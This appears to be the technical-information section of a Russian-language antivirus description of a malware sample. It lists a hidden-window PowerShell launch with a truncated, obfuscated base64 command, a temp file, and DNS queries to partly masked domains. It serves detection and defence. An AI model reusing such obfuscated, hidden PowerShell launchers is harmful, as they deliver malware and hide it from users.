Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAEQAQQBBAEQARAAxAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBBAFEAJwAsACcAQQAnACwAJwBtAFgAXwAnACkAOwAkAGkAMQBBAFEAQQBVAFUAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAJwArACcAYwB0AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1524
- %TEMP%\1352341.cvr
- DNS ASK mu#####zekisentosa.com
- DNS ASK ya###mutfak.com
- DNS ASK al###men.com
- DNS ASK au#####ommunitycare.com
- DNS ASK as##oks.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAEQAQQBBAEQARAAxAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBBAFEAJwAsACcAQQAnACwAJwBtAFgAXwAnACkAOwAkAGkAMQBBAFEAQQBVAFUAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAJwArACcAYwB0AC...' (со скрытым окном)